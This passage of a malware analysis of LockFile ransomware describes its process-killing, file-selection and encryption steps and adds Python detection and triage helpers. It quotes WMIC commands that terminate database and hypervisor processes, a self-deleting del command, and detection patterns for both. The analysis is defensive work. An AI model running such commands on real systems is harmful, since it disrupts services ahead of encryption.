C:\Windows\system32\cmd.exe /c wmic process where "name like '%vmware%'" call terminate       vmware

Table 1 WMIC Commands executed by Ransomware to Kill Processes
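A single WMIC terminate is routine administration; the same parent process issuing a burst of them against database and hypervisor services is the pre-encryption signature Table 1 documents. The following is an added detection example written for this post, not Cyble's or any vendor's rule: a Python routine that runs over constructed process-creation events (the field names parent_pid, parent_image and cmdline are assumptions modelled on what Sysmon event 1 or an EDR supplies, and the paths and pids are made up) and alerts when one parent kills two or more of the processes from the table.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Process names LockFile terminates, taken from Table 1 above.
LOCKFILE_KILL_TARGETS = {"vmwp", "virtualbox", "vbox", "sqlservr", "mysqld",
                         "omtsreco", "oracle", "tnslsnr", "vmware"}

# Matches the command shape from Table 1, tolerating straight or curly quotes:
#   wmic process where "name like '%sqlservr%'" call terminate
WMIC_TERMINATE = re.compile(
    r"wmic\s+process\s+where\s+[\"“]?\s*name\s+like\s+['‘]%([\w.-]+)%['’]?\s*[\"”]?\s+call\s+terminate",
    re.IGNORECASE,
)


def kill_cmd(process_name: str) -> str:
    """Build the cmd.exe/WMIC command line from Table 1 for one process name
    (used only to construct the sample events below)."""
    return ('C:\\Windows\\system32\\cmd.exe /c wmic process where "name like \'%'
            + process_name + '%\'" call terminate')


# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"parent_pid": 4312, "parent_image": "C:\\Users\\victim\\Downloads\\update.exe",
     "cmdline": kill_cmd("sqlservr")},
    {"parent_pid": 900, "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "wmic os get caption"},                      # benign WMIC use
    {"parent_pid": 4312, "parent_image": "C:\\Users\\victim\\Downloads\\update.exe",
     "cmdline": kill_cmd("vmwp")},
    {"parent_pid": 2200, "parent_image": "C:\\Tools\\admin.exe",
     "cmdline": kill_cmd("notepad")},                         # terminate, but not a listed target
    {"parent_pid": 4312, "parent_image": "C:\\Users\\victim\\Downloads\\update.exe",
     "cmdline": kill_cmd("mysqld")},
    {"parent_pid": 3100, "parent_image": "C:\\Tools\\backup.exe",
     "cmdline": kill_cmd("sqlservr")},                        # one listed target: below threshold
]


def find_mass_kill(events: List[Dict[str, object]], threshold: int = 2) -> List[Dict[str, object]]:
    """Group WMIC terminate commands by parent process and alert when one parent
    kills at least `threshold` distinct processes from the LockFile list."""
    seen: Dict[tuple, set] = defaultdict(set)
    for event in events:
        match = WMIC_TERMINATE.search(str(event["cmdline"]))
        if match and match.group(1).lower() in LOCKFILE_KILL_TARGETS:
            seen[(event["parent_pid"], event["parent_image"])].add(match.group(1).lower())
    return [
        {"parent_pid": pid, "parent_image": image, "targets": sorted(targets)}
        for (pid, image), targets in seen.items()
        if len(targets) >= threshold
    ]


if __name__ == "__main__":
    for alert in find_mass_kill(SAMPLE_EVENTS):
        print("possible pre-encryption service kill:", alert)
```

Keying on the parent process rather than on each cmd.exe child is what separates the ransomware burst from a maintenance script that happens to stop one database, and the threshold can be raised on hosts where operators legitimately stop several of these services.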

Once the ransomware kills all the processes, it iterates through the victim’s machine and encrypts the user document files and appends extensions with .lockfile, as shown in the figure below.

Appended extensions

Figure 5: Files encrypted by LockFile

Once the files are encrypted, the malware launches an HTML Application file (HTA) to show the ransom message to the user, as shown in the figure below, and then deletes itself.

Ransomware message

Figure 6: Ransom Message Created by LockFile

Code Analysis And Debugging

The figure below shows, under the debugger, the malware calling a series of WMIC commands to kill various processes. The list of commands is shown in Table 1.

WMIC commands

Figure 7: WMIC commands used by LockFile ransomware to kill processes

Once the ransomware kills all the defined processes, it extracts the ransom note content from the executable, as shown below.

Ransom note

Figure 8: Ransom Note Extracted from LockFile Ransomware in Memory

Afterward, the malware gets the list of drives using the GetLogicalDriveStringsA Application Programming Interface (API). The list of drives is then passed one at a time to the GetDriveTypeA API, and the result is compared with 03 (DRIVE_FIXED), which indicates whether the found drive is fixed media, e.g. logical drives, as shown below. Once such a drive is located, the malware creates a thread to conduct further ransomware activity.

Fixed media checked

Figure 9: Fixed Media checked by LockFile

The malware thread creates LOCKFILE-README.hta in the root, as shown in the figure below.

Thread creating

Figure 10: LockFile’s Thread creating LOCKFILE-README.hta in C:/

Then the ransomware starts iterating through the files and folders. The code passes every file or folder it finds through a series of checks, listed below.

1 – desktop.ini string is not present in the filename

2 – Windows is not present in the full path

3 – LOCKFILE string is not present in the filename

4 – NTUSER string is not present in the filename

The checks are shown in the below code.


Figure 11: Checks performed by LockFile.

Once all the checks are passed, the malware compares the file's extension with a pre-defined list of extensions embedded in the malware. The code is shown in the figure below.


Figure 12: File Extension Compared by LockFile

For example, in the figure below, we can see the malware comparing the extension of 36897c.rbf with the .1cd extension.


Figure 13 Ransomware Check File Extension

Similarly, the malware compares every extension shown in Table 2 with the victim's file. This activity lets us conclude that the malware targets only files with specific extensions.

.lcd .7z .7zip .acccdb .ai .asp .aspx .backup .bak .cd .cdr .cdx .cer .cf .cfl .cfu .config .cs .csv .dat .db .dbf .doc .docx .dt .dwg .edb .efd .elf .epf .erf .fpt .geo .grs .html .ibd .jpeg .ldf .lgf .lgp .log .mdb .mdf .mft .mp3 .mxl .myd .odt .pdf .pff .php .ppt .pptx .ps1 .psd .pst .rar .sln .sql .sqlite .st .tiff .txt .vdi .vhd .vhdx .vmdk .vrp .wdb .xls .xlsx .zip

Table 2 List of File Extensions which are targeted by ransomware
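As an added example (not code from the report or from Cyble), the file-selection logic described in Figures 11 to 13 and Table 2 can be reproduced as an incident-response triage helper that classifies a file inventory from an affected host into files already encrypted, files that would have been in scope, and everything else. Case-insensitive matching and the sample listing are assumptions.

```python
from pathlib import PureWindowsPath

# Targeted extensions reproduced from Table 2 of the write-up, as printed there.
TARGETED_EXTENSIONS = {
    ".lcd", ".7z", ".7zip", ".acccdb", ".ai", ".asp", ".aspx", ".backup", ".bak", ".cd",
    ".cdr", ".cdx", ".cer", ".cf", ".cfl", ".cfu", ".config", ".cs", ".csv", ".dat", ".db",
    ".dbf", ".doc", ".docx", ".dt", ".dwg", ".edb", ".efd", ".elf", ".epf", ".erf", ".fpt",
    ".geo", ".grs", ".html", ".ibd", ".jpeg", ".ldf", ".lgf", ".lgp", ".log", ".mdb", ".mdf",
    ".mft", ".mp3", ".mxl", ".myd", ".odt", ".pdf", ".pff", ".php", ".ppt", ".pptx", ".ps1",
    ".psd", ".pst", ".rar", ".sln", ".sql", ".sqlite", ".st", ".tiff", ".txt", ".vdi", ".vhd",
    ".vhdx", ".vmdk", ".vrp", ".wdb", ".xls", ".xlsx", ".zip",
}

def passes_name_checks(path: str) -> bool:
    """The four checks from Figure 11. Case-insensitive matching is an assumption;
    the write-up does not say whether the malware compares case-sensitively."""
    name = PureWindowsPath(path).name.lower()
    return ("desktop.ini" not in name and "windows" not in path.lower()
            and "lockfile" not in name and "ntuser" not in name)

def is_in_scope(path: str) -> bool:
    """True if LockFile's selection logic would have chosen this file for encryption."""
    return passes_name_checks(path) and PureWindowsPath(path).suffix.lower() in TARGETED_EXTENSIONS

def triage_listing(paths):
    """Split a file listing into (already encrypted, would have been targeted, other)
    so a responder can size the impact from a directory inventory."""
    encrypted, in_scope, other = [], [], []
    for p in paths:
        if PureWindowsPath(p).suffix.lower() == ".lockfile":
            encrypted.append(p)
        elif is_in_scope(p):
            in_scope.append(p)
        else:
            other.append(p)
    return encrypted, in_scope, other

# Constructed sample inventory (not from the report) covering each branch of the checks.
SAMPLE_LISTING = [
    r"C:\Users\Public\LOCKFILE-README.hta",          # ransom note: 'LOCKFILE' in name
    r"C:\Users\bob\Documents\budget.xlsx.lockfile",  # already encrypted
    r"C:\Users\bob\Documents\notes.txt",             # targeted extension
    r"C:\Users\bob\desktop.ini",                     # excluded by check 1
    r"C:\Windows\System32\config\SAM",               # excluded by check 2
    r"C:\Users\bob\NTUSER.DAT",                      # .dat is targeted, but check 4 excludes it
    r"D:\backups\db.bak",                            # targeted extension
    r"C:\Users\bob\photo.png",                       # extension not in Table 2
]
```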

As shown below in figure 14, once the file is found with the defined extension, the malware reads the plain text content from the file.


Figure 14 Read Plain Text content from Victim’s File

It then calls another user-defined function for encrypting the content using Advanced Encryption Standard (AES), as shown below.


Figure 15 Call Encryption Function to encrypt the content

Once the content is encrypted, the malware writes it back into the file and then renames the file to append the .lockfile extension using the MoveFileA API, as shown in the figure below.


Figure 16 Append .lockfile extension to the user document file

The same activity is shown below in figure 17.


Figure 17 Append .lockfile extension to the user document file while debugging

Once all the files have been encrypted, the malware creates a ransom note .hta file in the C:\Users\Public directory, as shown in the figure below.


Figure 18 Creates .HTA ransom file in C:\Users\Public

Once the .hta ransom file is created, the malware calls the CreateProcess API to launch the .hta file using the mshta.exe Windows utility. mshta.exe is the utility that executes Microsoft HTML Application (HTA) files.


Figure 19 Launch.HTA ransom File using mshta.exe

Finally, once all the files are encrypted, the malware deletes itself by calling the del command, as shown below.


Figure 20 Use Del command to delete itself
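The behaviours described above (WMIC process termination, mshta.exe launching the .hta note from C:\Users\Public, and self-deletion through del) can be turned into process-creation detections. The following is an added example, not part of the report; the event records are constructed and the rule names are my own.

```python
import re

# Constructed Sysmon-style process-creation records (not from the report), as
# (parent image, image, command line). The first three mirror the behaviour in Figures 7-20.
SAMPLE_EVENTS = [
    (r"C:\Users\bob\update.exe", r"C:\Windows\System32\cmd.exe",
     r"""C:\Windows\system32\cmd.exe /c wmic process where "name like '%vmware%'" call terminate"""),
    (r"C:\Users\bob\update.exe", r"C:\Windows\System32\mshta.exe",
     r"mshta.exe C:\Users\Public\LOCKFILE-README.hta"),
    (r"C:\Users\bob\update.exe", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c del C:\Users\bob\update.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
     r"notepad.exe C:\Users\bob\notes.txt"),
]

# Command-line patterns for the two behaviours the write-up documents.
RULES = [
    ("wmic_process_terminate", re.compile(r"\bwmic\b.*\bprocess\b.*\bwhere\b.*\bcall\s+terminate\b", re.I)),
    ("mshta_hta_from_public", re.compile(r"\bmshta(\.exe)?\b.*\\users\\public\\.*\.hta\b", re.I)),
]

def classify(event):
    """Return the rule names an event trips, including the self-deletion pattern
    (cmd.exe /c del <path> where <path> is the parent process image itself)."""
    parent, image, cmdline = event
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    m = re.search(r"\bdel\b\s+\"?([^\"\s]+)", cmdline, re.I)
    if m and image.lower().endswith("cmd.exe") and m.group(1).lower() == parent.lower():
        hits.append("self_delete_via_del")
    return hits

def scan(events):
    """(command line, matched rules) for every event that trips at least one rule."""
    return [(ev[2], classify(ev)) for ev in events if classify(ev)]

def suspicious_parents(events, min_rules=2):
    """Parent images whose children trip at least min_rules distinct rules: one hit
    may be an admin script, but the combination is the LockFile sequence."""
    seen = {}
    for ev in events:
        for hit in classify(ev):
            seen.setdefault(ev[0], set()).add(hit)
    return sorted(p for p, rules in seen.items() if len(rules) >= min_rules)
```

Correlating on the parent image rather than alerting on each command line separately keeps the WMIC rule from firing on legitimate administration scripts while still catching the full sequence.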

Conclusion 

The threat actors behind LockFile exploit publicly disclosed vulnerabilities in sequence: they first attack Microsoft Exchange Server and then use the PetitPotam vulnerability to compromise the Domain Controller. After achieving these two objectives, the TA drops the LockFile ransomware onto the systems.

Based on the ransom notes, Cyble Research Labs speculates that the TA may be creating a unique custom variant of the LockFile ransomware for each victim organization.

Cyble Research Labs continuously monitors the LockFile ransomware activity; we will continue to update our readers with our latest findings.

Recommendations

Cyble Research Labs has listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the suggestions given below:

  • Use a reputed anti-virus and internet security software package on your connected devices.     
  • Conduct regular backup practices and keep those backups offline or in a separate network. 
  • Refrain from opening untrusted links and email attachments without verifying their authenticity. 
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.  
  • Use strong passwords and enforce multi-factor authentication wherever possible. 

MITRE ATT&CK® Techniques

| Tactic | Technique ID | Technique Name |
| --- | --- | --- |
| Reconnaissance | T1595.002 | Active Scanning |
| Reconnaissance | T1591 | Gather Victim Org Information |
| Reconnaissance | T1593 | Search Open Websites/Domains |
| Initial Access | T1190 | Exploit Public-Facing Application |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Defense Evasion | T1574.001 | Hijack Execution Flow: DLL Search Order Hijacking |
| Lateral Movement | T1210 | Exploitation of Remote Services |
| Impact | T1486 | Data Encrypted for Impact |

Indicators of Compromise (IoCs):   
